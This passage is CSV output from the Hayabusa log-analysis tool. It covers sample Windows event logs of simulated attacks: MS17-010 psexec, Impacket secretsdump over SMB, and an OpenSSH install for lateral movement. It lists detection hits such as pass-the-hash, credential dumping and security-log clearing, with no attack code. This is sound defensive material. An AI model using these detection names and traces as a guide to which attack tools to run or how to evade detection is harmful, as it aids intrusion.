MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.213 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:19.291 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:22.992 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:22.994 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.009 
+09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.009 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.025 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.042 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.044 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.060 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 
0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 17:51:23.171 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\MS17_010_psexec.evtx | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4624,4688,5140,5145-Eternal Romance - MS17_010_psexec (GLOBAL).evtx" +2021-04-22 18:00:09.959 +09:00,fs03vuln.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb3084,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:10.026 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0xb3084,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 
0xb314d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:11.118 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.23.9 | LID: 0xb314d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0xb32cb,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.226 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:13.258 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0xb32cb | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,../hayabusa-rules/hayabusa/default/alerts/Security/4674_OperationAttemptOnPrivilegedObject_PossibleHiddenServiceAttempt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.421 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\BTeHLZkJ.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.437 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | 
Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\NMdzZfem.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:14.735 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\BTeHLZkJ.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: SYSTEM32\NMdzZfem.tmp | IP Addr: 10.23.123.11 | LID: 0xb32cb,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 
4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:16.724 +09:00,fs03vuln.offsec.lan,5145,high,CredAccess,Possible Impacket SecretDump Remote Activity,,../hayabusa-rules/sigma/builtin/security/win_impacket_secretdump.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.875 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:19.891 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 
0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:20.003 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP | IP Addr: 10.23.23.9 | LID: 0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.544 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.560 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS\ADMMIG\DESKTOP\DESKTOP.INI | IP Addr: 10.23.23.9 | LID: 
0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.575 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.591 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 
0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.606 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.622 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x6c49d,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 18:00:22.696 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\Impacket secret dump.evtx | IP Addr: 10.23.23.9 | LID: 
0x6c366,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4656, 5145, 4674-Impacket secret dump via SMB.evtx" +2021-04-22 19:02:14.393 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:02:14.406 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-WindowsCapability -Online -Name OpenSSH.Server~~~~0.0.1.0,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:02:14.619 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Apply-WindowsUnattend"" ParameterBinding(Set-Alias): name=""Value""; value=""Use-WindowsUnattend""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:02:14.619 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Add-ProvisionedAppxPackage"" ParameterBinding(Set-Alias): name=""Value""; 
value=""Add-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:02:14.620 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Remove-ProvisionedAppxPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Remove-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:02:14.620 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Get-ProvisionedAppxPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Get-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:02:14.620 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Optimize-ProvisionedAppxPackages"" ParameterBinding(Set-Alias): name=""Value""; value=""Optimize-AppxProvisionedPackages""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:02:14.621 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Set-ProvisionedAppXDataFile"" ParameterBinding(Set-Alias): name=""Value""; value=""Set-AppXProvisionedDataFile""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:02:14.621 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Add-AppProvisionedPackage"" ParameterBinding(Set-Alias): name=""Value""; value=""Add-AppxProvisionedPackage""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server install.evtx +2021-04-22 19:02:14.621 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-Alias): ""Set-Alias"" ParameterBinding(Set-Alias): name=""Name""; value=""Remove-AppProvisionedPackage"" ParameterBinding(Set-Alias): name=""Value""; 